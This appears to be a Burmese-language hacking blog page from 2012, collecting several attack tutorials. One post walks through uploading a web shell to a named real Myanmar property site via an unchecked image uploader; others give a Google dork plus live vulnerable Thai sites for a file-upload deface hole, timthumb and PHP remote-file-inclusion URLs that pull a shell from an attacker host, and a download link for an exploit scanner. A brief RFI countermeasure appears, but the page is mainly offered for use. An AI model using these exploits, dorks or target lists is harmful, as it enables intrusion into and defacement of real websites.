mmhackerforums.noonhost.com မွတင္ထားေသာ ဗီဒီယို ဖိုင္အားကၽြန္ေတာ္ Tutorial အျဖစ္ ျပန္ျပင္ေရးသာပါသည္။
shwekoyantaw
Read More ->>

Wednesday, April 4, 2012

XXXXXXXX***************xxxxxxxxxxxxxxxx[Tutorials]



မေန ့ညကပ်င္းပ်င္းနဲ ့ ... ဒီ ဘန္ဂလားဆိုက္ဒ္ေတြ scan ရတာနဲ ့ေညာင္းလာလို ့ samuels080 နဲ ့ ေတာ္ကီပစ္ေနၾကတာ ေတာင္ေရာက္ေၿမာက္ေရာက္ေပါ့ ... အဲ့မွာ သူကေမးတယ္..ဘာလုပ္ေနလဲလို ့ .. ဒါနဲ ့က်ေနာ္လည္း က်ေနာ့္ ဝသီအတုိင္း ေတာင္ေရာက္ေၿမာက္ေရာက္လို ့ ... ၿပီးေတာ့ သူ ့ကိုၿပန္ေမးေတာ့ http://shweo.com/myanmar-videos/play/4250 ေရႊအိုးဆို္က္ဒ္မွာ ၿမန္မာကားၾကည့္ေနတယ္ (သူကမေလးမွာေလ) ဒါနဲ ့ကိုလည္း ကိုယ့္ႏိုင္ငံေကာ္နက္ရွင္ နဲ ့အားက်မခံ ဘယ္ရမလဲ ဖြင့္ၾကည့္တာ .. အမယ္ .. သေကာင့္သား connection ကတတ္ခ်င္ေယာင္ေဆာင္ၿပေနတာ ...  ဒါနဲ ပဲ .. အၿပစ္မရွိအၿပစ္ရွာ .. shweo ဆိုက္ဒ္ကိုတင္းတင္းနဲ ့ ...လက္ကလဲ ကၿမင္းခ်င္တာနဲ ့ ... တခ်က္ရွိဳးလိုက္တယ္.. အဲ့မွာ .. shweo ဆိုက္ဒ္က အၾကမ္းဖ်င္းၾကည့္လိုက္ေတာ့ အေပါက္ရွာမေတြ ့ဖူးေပါ့ ...

ဒါနဲ ့ ဘယ္ရမလဲ ... သူ ့ ip scan တယ္.. သူနဲ ့host တူတာလိုက္ရွာလိုက္တာ.. http://www.shwehousing.com/ ဒီဆို္က္ဒ္ကေလးေတြ ့ပါေလေရာ .. အခမဲ့ေၾကာ္ၿငာ ( အခန္းေတြ ) လို ့ရတဲ့ ၿမန္မာ ယsearch engine ဆိုက္ဒ္တမ်ိဳးပါပဲ .. သူ့ဆိုက္ဒ္ကိုလဲ အၾကမ္းဖ်င္းၾကည့္လိုက္တာ .. မလြယ္ဘူး .. ရွာလို ့လဲမေတြ ့ဘူး .( ဆိုက္ဒ္ကဒီလိုပံုစံနဲ ့ေရးထားတာကိုး http://www.shwehousing.com/ads/index/page/6. ) ဆိုၿပီး ေတာ္ၿပီလို ့ လက္ေလွ်ာ့မယ္အလုပ္မွာ ... ညာဘက္ေထာင့္နားက အၿပာေရာင္ button ေလးနဲ ့ free ေၾကာ္ၿငာေနရာေတြ ့ပါေလေရာ .. ဒန္  တန္ ့ တန္ ....  :mrgreen:

စဥ္းစားလိုက္တယ္.. ေၾကာ္ၿငာ ... ၿပီးေတာ့ အခန္းေတြဆုိေတာ့  picture ပါမွာပဲ ... ဒါဆို upload ကေတာ့မၿဖစ္မေနေပးကိုေပးထားရမွာဆိုၿပီး .. အဲ့ဒိေနရာ ဝင္စမ္းမယ္ကြာဆိုၿပီး.. ဆက္ၾကည့္ၾကပါ...

က်ေနာ္ တဆင့္ခ်င္းစီ ပံုႏွင့္တကြရွင္းၿပမွာၿဖစ္ပါတယ္ ...
ဒီေအာက္ကၿမင္၇တဲ့အတိုင္း အဲ့ေနရာမွာ free ေၾကာ္ၿငာတင္ဖို ့ေနရာပါ...

ဒီေအာက္ကပံုကေတာ့ .. ေၾကာ္ၿငာတင္ ( image upload ) function ရဖို ့အတြက္ ... ေၾကာ္ၿငာတင္မည့္ အေပၚကလင့္ခ္ကိုႏွိပ္လိုက္ပါတယ္ 
 


ကဲ.. ေနာက္တပံု .. ဒါကေတာ့ form ၿဖည့္ဖို ့ေနရာနဲ ့ က်ေနာ္တို ့အဓိကရွာေနတဲ ့( လုပ္ကြက္ ) image upload ကိုေတြ ့ပါၿပီဗ်ာ ... ေအာက္မွာၿပထားတဲ့အတိုင္းပါပဲ
 
 



အဓကေနရာလာပါၿပီ ... က်ေနာ္အေပၚက ေဖာင္မွာ nick တို ့ ph num:  တို ့ email တို ့ ကို ၿဖည့္လိုက္ပါ ( အစစ္ေတြမလို ) .. ခု ဒီဆိုက္ဒ္မွာ ေတြ ့ရတဲ့ image uploader ေလးက ကိုယ့္စက္ထဲက shell ကိုေရြးေပးလိုက္တာနဲ ့ auto uploader ေလးပါ .. ေနာက္ page ကိုမေၿပာင္းပဲ ဒီ page မွာတင္ upload တင္ထားလိုက္ပါတယ္ .. ကဲထားပါ ... ခုတင္လိုက္ၿပီ .. အဲ့ေတာ့ ဒီလိုေလးေပၚလာမယ္..



information လိုတာရယ္ shell ရယ္ upload တင္ၿပီးရင္ click လုိက္ပါ .. ေနာက္တစ္ page ကိုေ၇ာက္ေအာင္ .. ခုနက shell က ပလိန္းဂ်ီး upload တင္လို ့ရလိုက္တာကိုေရာ သတိထားမိၾကရဲ ့လား .. အဲ့ဒါပဲ အဓိက အမွား ... ဆိုက္ဒ္ရဲ ့ vulnerable hole .. file extension ကိုေသခ်ာမစစ္ဘူး .. အကုန္လက္ခံတဲ့ အတြက္ .. ခံေပေတာ့ေပါ့ေနာ့္ ...  ...
ကဲ ကဲ .. ေအာက္ကပံုေပၚလာရင္ ... ကိုယ့္ ads တင္ထားတာကိုၿပန္ၾကည့္ၾကမယ္.. click လိုက္ပါ ၿပထားတဲ့အတိုင္း


ဒါဆိုရင္ေတာ့ ကိုတင္ထားတဲ့ shell ပါပါတဲ့ ads ကိုေတြ ့၇မွာၿဖစ္ပါတယ္... ပံုမွာၿပထားတဲ့အတိုင္း ... photo ေနရာမွာ shell ကိုတင္ထားေတာ့ photo ကိုေရြးေပးပါ .. အနီေရာင္ ေလးေထာင့္ကြက္ေလးေပၚေနတာေတြ ့ရပါလိမ့္မယ္ ... (မေတြ ့ရင္ ေဖာ္ၿမဴလာမွားေနလို ့   ခိ ... ခိ) 
 
 

ကဲပံုမွာၿပထားတဲ့အတိုင္း  photo ေနရာကိုေရြးၿပီး၇င္ ဘာမွမလုပ္ပါနဲ ့.. ဒီတိုင္းထားပါ... .. ခင္ဗ်ားတို ့လုပ္ရမွာက .. right-click ဖြင့္ view page source code ကိုေရြးၿပီး သူ ့ page ရဲ ့ source code ေတြကိုရွာမယ္... ဘာလို ့လဲသိလား... ** က်ေနာ္တို ့ခုနကတင္ထားတဲ့ shell ေနရာကိုအတိအက်သိရေအာင္လို ့ပါ **
ေအာက္မွာၿပထားတဲ့အတိုင္း code မ်ိုဳးေလးကိုရေအာင္ ရွာပါ .


BINGO ... here we go .. I successfully uploaded shell to shwehousing.com >>
 

ကဲ ကဲ ပံုႏွင့္ တကြ ေသခ်ာရွင္းၿပထားတယ္ေနာ္ ... အ့ဲေတာ plx do not touch that mm site .. this tutorial for educational purpose only. ကိုယ့္ကိုကို hacker လို ့ခံယူထားရင္ hacker ေတြရဲ ့ 'ethic' အတိုင္းေတာ့ေနၾကဖို ့လိုပါလိမ့္မယ္... ဒါေၾကာင့္ဘာမွမလုပ္ပါနဲ့ .. ကုိယ့္ႏိုင္ငံဆိုက္ဒ္ၿဖစ္ေနတဲ့အတြက္ ...

ဒီဟာကို tutorial section ထဲမွာဘာလို ့ထည့္တာလဲဆိုေတာ့ shell upload တင္ၿပီးၿပန္ရွာပံုကိုပါသိေစခ်င္လို ့ ေသခ်ာရွင္းၿပထားတဲ့အတြက္ပါ ...

shweo နဲ ့ အဲ့ဒိ http://www.shwehousing.com နဲ ့က host တူပါတယ္ .. shell တင္ၿပီးရင္ၾကည့္ၾကည့္ပါ ...

က်ေနာ္ .. tutorial ဆိုေတာ္ယံုေရးခဲပါတယ္ .. (ေသာက္ရမ္းပ်င္းတာ :D) ခုေတာ္ေတာ္ေလးေတာင္ေညာင္းသြားဘီ ..............

Note...............................................................................................................................................
**** copyright@2012<dongoth> ***** this tutorial is made by me. but you can share it. have fun ..
.......................................................................................................................................................
copy from mmhackforums.noonhost.com
Read More ->>

Monday, April 2, 2012

Gr3eNoX Exploit Scanner -Google Dork Scanner- SQLi - LFi Fu











Features:

-Google Based Search
-100 links per page
-Excludes google,youtube,rss2 links
-Import from file
-Custom Domain
-SQLi Scanner
-LFi Scanner
-LFi Fuzzing up to 11 directories
-RFi Scanner
-Progress bar

virus scan
https://www.virustotal.com/file/96437b2018b56b145f1a0a9c31de1822d92ea8510639a37fbab0122b72e21afc/analysis/1332679422/

Download
http://www.mediafire.com/?af5xra1qjxicyd3





source from mmhackforums.noonhost.com
Read More ->>

Timthumb Vuln & How can hack?


WP ရဲ ႔ Zero Day ဆိုျပီး အြန္လိုင္းမွာ အုပ္ေအာ္ ေသာင္းနင္းျဖစ္သြားတဲ့ Plugin ေလးအေၾကာင္း နည္းနည္းေျပာရေအာင္..။
ဒီ Hacking Tech: က ေပၚလာတာ လပိုင္းပဲရွိေသးတယ္ဗ် ျမန္မာျပည္မွာေတာင္ လူသိပ္မသိလွေသးဘူး..။ လက္ခ်ိဳးေရလို႔ရတယ္ သိတဲ့လူ…။
ေပါက္သြားတဲ့ Plugin ကေတာ့ timthumb.php ပါ timthumb ဟာ Photo ေတြကို ခ်ံဳ ႔ ခ်ဲ ႔လုပ္ရာမွာ အလြန္အသံုး၀င္တဲ့ Plugin တစ္ခုျဖစ္ပါတယ္ ဒါ့အျပင္ သူဟာ တျခား URL ကေန Photo ေတြကိုပါ လွမ္းယူႏိုင္ပါေသးတယ္ ဒီေနရာမွာေပါက္တာပါပဲ သူက တျခားလင့္ခ္
ေနရာက ပံုေတြယူမယ္ဆိုရင္ www.target.com/…/timthumb.php?src=www.photosite.com/photo.php ဆိုျပီး သြားသဗ် အဲ့ဒီ့ src= ေနာက္မွာ Shell Link ကိုသြားထည့္လိုက္မယ္ဗ် ကဲ www.target.com/…/timthumb.php?src=www.hacker.com/shell.php
ေပါ့ ဒါဆိုလည္းသူက Shell ၾကီးကို Upload ၾကိတ္သြားမွာပဲ အဲ့ဒီ့အခါက် ကၽြန္ေတာ္တို႔က ေအးေအးေဆးေဆးသြား ေကာက္သံုးရံုပဲ အဲ့ဒီ့ Shell Link ကို ဘယ္လို ယူရမလဲဆိုေတာ့ shell.php Link ကို MD5 Change ခ်ရမယ္ဗ် www.hacker.com/shell.php ဆိုရင္
3434FF35A3614422F97F13251661A890 ေပါ့ဗ်ာ
အင္း ဒါဆို www.target.com/…/cach/src=3434FF35A3614422F97F13251661A890.php ကိုသြားၾကည့္လိုက္ရင္ ကၽြန္ေတာ္တို႔ တင္ထားတဲ့ SHell ၾကီးတင္လာပါမယ္ ကဲ ေပ်ာ္စရာၾကီးေနာ္
သူက Theme က Plugin မွာ ေပါက္တဲ့အတြက္ thumb ရွိရာ Directory ကိုသြားရာမွာ Theme ေပၚမူတည္ျပီးသြားရပါ့မယ္ ဥပမာ www.target.com ရဲ ႔ Theme ဟာ Fordreporter က ဆြဲရင္ fordreporter/scripts/thumb.php နဲ႔သြားရပါ့မယ္
ဥပမာ www.target.com/fordreporter/scripts/thumb.php ေပါ့ဗ်ာ Upload လုပ္ခ်င္ရင္ www.target.com/fordreporter/scripts/thumb.php?src=www.hacker.com/shell.php Shell ကိုသြားၾကည့္ရင္ www.target.com/fordreporter/scripts/cache/src=3434FF35A3614422F97F13251661A890.php
ဆိုျပီးသြားရပါ့မယ္
Dork ရွာရင္လည္း ထိုနည္းလည္းေကာင္းပါပဲ Theme ေပၚမူတည္ျပီး inurl သို႔ allinurl နဲ႔တြဲျပီး inurl:fordreporter/scripts/thumb.php ဆိုျပီးရွာရပါ့မယ္
ဒီလို Theme နဲ႔ Thumbe Directory ကိုတြဲျပီး ရွာဖို႔ကိုေတာ့ ဒီမွာ သြားၾကည့္ပါ
ေအာ္ Countermeasure လားလြယ္ပါတယ္ ဒီ Vuln ဟာ thumb 2.0 ေအာက္ကဟာေတြပဲ ေပါက္တာျဖစ္လို႔ ဒီေနရာ ကေန Code ေတြယူျပီး ျပင္လိုက္ပါ :-P
PS : WP မွာ Timthumb ေပါက္မေပါက္စစ္တဲ့ Plugin ရွိပါတယ္

post by ghostarea.net
copy by Me ..........he...he
Read More ->>

Saturday, March 17, 2012

"Tmedit Popuop" Deface and Shell upload vulnerability



Dork: inurl:/editor/tmedit/popups
Exploit Path : /editor/tmedit/popups/InsertFile/insert_file.php

Search This Dork in google........  Dork: inurl:/editor/tmedit/popups



You must be choice one URL from result.........
Now you can upload your file.........

Live Demo
http://www.arabicthailand.com/editor/tmedit/popups/insert_image_en.php
http://www.masjidklangchachengsao.com/editor/tmedit/popups/InsertFile/insert_file.php

Result
http://www.arabicthailand.com/images/backlinks.html
http://www.masjidklangchachengsao.com/uploadfiles/backlinks.html
Read More ->>

Monday, February 27, 2012

RFI Hacking Technique



RFI Hacking ဆိုတာ ေလးကို အရင္ေျပာပါ့မယ္.။ RFI Hacking ရဲ ႔အရွည္က Remote File Inclusion ျဖစ္ျပီး Remote ဆိုတဲ့အတုိင္း Website တစ္ခုကို အျခား Website ကေန ထိန္းခ်ဳပ္ျခင္းပါ..
ပထမဦးဆံုး Exploit Code ကိုအရင္ၾကည့္ရေအာင္…။
PHP Code:
$page = $_GET['page'];
include(“”.$page.”.html”);
include Command က တဆင့္ တျခား Website က Webpage ကို ကူးယူႏိုင္တဲ့ Vuln ကို ျဖစ္ေစပါတယ္..။ ဥပမာ…Website တစ္ခုမွာ
1.Music
2.Video
3.contact ဆိုတဲ့ Page သံုးခုရွိမယ္ဆိုပါစို႔…။ Index ေကာပါရင္ ေလးခုေပါ့ဗ်ာ.။ ဒီေတာ့
1.music.php
2.video.php
3.contact.php
4.index.php ဆိုျပီး ေလးခုရွိပါမယ္ ( Index Page မွာေတာ့ Page Header ေတြ Footer ေတြ ပါမယ္ေပါ့ဗ်ာ..)
အဲ့ဒီ့ Page ေလးခုကို သြားခ်င္ရင္ -
http://www.target.com/index.php
http://www.target.com/index.php?=music.php
http://www.target.com/index.php?=video.php
http://www.target.com/index.php?=contact.php ဆိုျပီး သြားရပါလိမ့္မယ္.။
ဒီလို ဘာလို႔ သြားလို႔ရတာလဲဆိုတာကို ေျပာဖို႔ Vuln ျဖစ္ေနတဲ့ Index Page ရဲ ႔ Code ေလးကိုၾကည့္ရေအာင္..။

PHP Code:
//html for header
//html for menu
<?php
$page = $_GET['page'];
include($page); ?>
//html for footer
php Code ရဲ ႔ Line No.2 ကိုၾကည့္လို္က္ပါ. Get Method ကို ေတြ ႔ပါလိမ့္မယ္.။ အဲ့ဒီ့ Get Method ေၾကာင့္ ကၽြန္ေတာ္တုိ ႔ Page ေတြကိုသြားတဲ့အခါမွာ
http://www.target.com/index.php?=video.php လို႔ သြားခြင့္ရွိတာပါ..။ Coding မွာ ၾကည့္လိုက္ပါ.. လိုင္း နံပတ္ ၅ က include ေၾကာင့္ video Page မွာ Copy ကူးျပီး Index မွာ video.php အေနနဲ႔ တက္လာတာပါ..။ ဒါေပမယ့္ အဲ့ဒီမွာၾကည့္လိုက္ပါ page ကို Variable ေၾကညာမထားပါ ဒါက အၾကီးမားဆံုး Security အမွားၾကီးပါ.။ ဒီသေဘာအရဆို တျခား အေ၀းက Website တစ္ခု ကိုေကာ Copy ကူးျပီး index မွာလာခ်ိတ္လို႔ ေကာ မရဘူးလားလို ႔ ေမးလာရင္ ရပါတယ္
http://www.target.com/index.php?=http://www.google.com/? လို႔ သာ ရိုက္လိုက္ရင္ google Page ဟာ Copy ကူးျပီး Index Page မွာ တက္လာပါေတာ့တယ္
google မဟုတ္ဘဲ တျခား ၾကိဳက္တဲ့ Page တင္လို႔ရတာေၾကာင့္ ကၽြန္ေတာ္တို႔ ဟာ shell link ကုိ ထည့္ျပီး Target Website ကိုထည့္ခ်ဳပ္လိုက္ပါေတာ့တယ္.။ ေအာက္မွာၾကည့္ပါ..။
http://www.target.com/index.php?page=ht ... /shell.txt ဆိုျပီး ခ်ိတ္လိုက္တာနဲ႔ Text File အေနနဲ႔ သိမ္းဆည္းထားတဲ့ Shell ကို excute လုပ္ျပီး Target Website ေပၚမွာ လာ Run တဲ့ အတြက္ ကၽြန္ေတာ္ဟာ Target ရဲ ႔ Website ကို ထိန္းခ်ဳပ္ ခြင့္ရွိသြားပါျပီ..။
…………………………………………………
RFI Exploit ျဖစ္ေစတဲ့ အျခား ဥပမာ တစ္ခုကို ထပ္ျပီး တင္ျပပါ့မယ္..။ Undefined Variable ပါ..။ Programming ကို Basic ေလာက္ နားလည္တဲ့လူဆိုရင္ေတာ့ Variable ဆိုတာ ဘာလဲ လို႔ ထပ္ရွင္းျပဖို႔ မလုိေတာ့ပါဘူး ဒီေနရာမွာ Hacking Method ကို ပဲ ေျပာျပမွာ ျဖစ္လို႔ Variable ဆိုတာ ကို ရွင္းျပမေနေတာ့ပါဘူး..။
Developer တစ္ေယာက္ဟာ သူ ႔ ရဲ ႔ Website ကို သူ ႔ရဲ ႔ Mysql Server နဲ ႔ ခ်ိတ္ဆက္ခ်င္ပါတယ္.။ ဥပမာ..သူ ႔ ဆိုဒ္ Index Page မွာ Content ေတြ ကို Mysql နဲ႔ ခ်ိတ္ထားခ်င္တယ္ဆိုပါစို႔. Mysql Server ကို ခ်ိတ္ဆက္ဖို႔ဆိုရင္ User Name နဲ ႔ Password တစ္ခု လို္အပ္ပါလိမ့္မယ္..။ အဲ့ဒီ့ User Name နဲ႔ Password ကို db_details.php ဆိုတဲ့ File ထဲမွာ သိမ္းထားပါတယ္.။
တကယ္လုိ ႔ ကၽြန္ေတာ္တို႔ဟာ video.php ဆိုတာကို index Page က တစ္ဆင့္ ဖြင့္တယ္ဆိုပါစို႔ဗ်ာ.။
http://www.target/index.php?page=video.php

တကယ္လို႔ အဲ့ဒီ့ Page က PHP Code ကိုၾကည့္မယ္ဆိုရင္..
PHP Code:
//html for header
//html for menu
<?php
$database_config_file = “db_details.php”;
$page = $_GET['page'];
include($page);
?>
//html for footer <?php
include($database_config_file);
//code to connect to MySQL and get the latest updates
?>
Index Page မွာ $database_config_file ကို db_detils.php နဲ႔ ခ်ိတ္ထားတာကို ေတြ ႔ရပါမယ္..။ ဒါေပသိ ကၽြန္ေတာ္ တို ႔ ခုေရာက္ေနတဲ့ ေနရာက video.php ျဖစ္တဲ့အတြက္ အဲ့ဒီ့ db_detils.php နဲ႔ခ်ိတ္ဖို႔ မလိုအပ္ပါဘူး..ဒီေနရာမွာ လာခ်ိတ္ေနတာေတြ ႔ ရ မွာပါ..။ အဲ့ဒီ့ ေနရာမွာ ျပႆနာ တက္သြားတာပါ..။ ဒီေတာ့ ထံုးစံ အတိုင္း ကၽြန္ေတာ္တို ႔ရ ဲ ႔ Shell Link ကို ခ်ိတ္ခြင့္ရွိသြားပါျပီ..။
http://www.target/index.php?page=http:/ ... /shell.txt ေပါ့ဗ် 

RFI Hacking Technique ကေတာ့ ဒီေနရာမွာ ျပီးသြားပါျပီ..။ ေအာက္ဟာကေတာ့ Countermeasure ေလးပါ..။
Countermeasure

ေရွ ႔မွာ သီအိုရီ ေျပာခဲ့တဲ့ အတိုင္း include Method ေၾကာင့္ Copy ကူးျပီး Get နဲ႔ လွမ္းယူလိုက္တာျဖစ္တဲ့အတြက္ ဘယ္ကဟာကို လွမ္းယူရမယ္ဆိုတာ အတိအက် ေျပာေပးလိုက္ရင္ ကူးခ်င္တဲ ့ ဆိုဒ္ကို Copy ကူးခြင့္ေပးမွာ မဟုတ္ဘဲ တိတိက်က် ျဖစ္သြားမွာပါ 
PHP Code
<?php
$page = $_GET['page'];
switch($page){
case “videogames”;
include(“videogames.php”);
break;
case “contact”:
include(“contact.php”);
break;
case “music”:
include(“music.php”);
break;
default: //A page wasn’t chosen, or one that wasn’t “home” or “gallery”
echo “Choose a page from our fine selection!1!!”;
break;
}
?>
အခုဆိုရင္ RFI Hacking ကို ေသေသခ်ာခ်ာ နားလည္ သြားေလာက္ျပီ ထင္ပါတယ္…။
အားလံုး အဆင္ေျပၾကပါေစ…။

source By Ghostarea.net
Read More ->>

ROCK FOREVER (MUSIC)

Pageviewers

CBOX

Manutd-Results

Label

Android (3) autorun (3) Backtrack (8) batch file (19) blogger (10) Botnet (2) browser (5) Brute Force (6) cafezee (2) cmd (5) Cookies (2) crack (12) Cracking (2) crypter (7) DDos (20) deepfreeze (4) defacing (1) defence (16) domain (4) Dos (9) downloader (4) ebomb (2) ebook (48) Exploit (26) firewall (3) game (2) gmail (11) google hack (16) Hacking Show (3) Hash (4) hosting (1) icon changer (1) ip adress (6) Keygen (1) keylogger (8) knowledge (67) locker (1) maintainence (8) network (17) news (31) other (35) passwoard viewer (7) password (12) Philosophy (6) Phishing (8) premium account (2) proxy (7) RAT (10) run commands (4) script (27) Shell code (10) shortcut Key (2) SMTP ports (1) social engineering (7) spammer (1) SQL Injection (30) Stealer.crack (5) tools (125) Tools Pack (4) tutorial (107) USB (3) virus (32) website (84) WiFi (4) word list (2)

Blogger templates

picoodle.com

Blogger news

Print Friendly and PDF

HOW IS MY SITE?

Powered by Blogger.

Followers

About Me

My Photo
Hacking= intelligent+techonology+psychology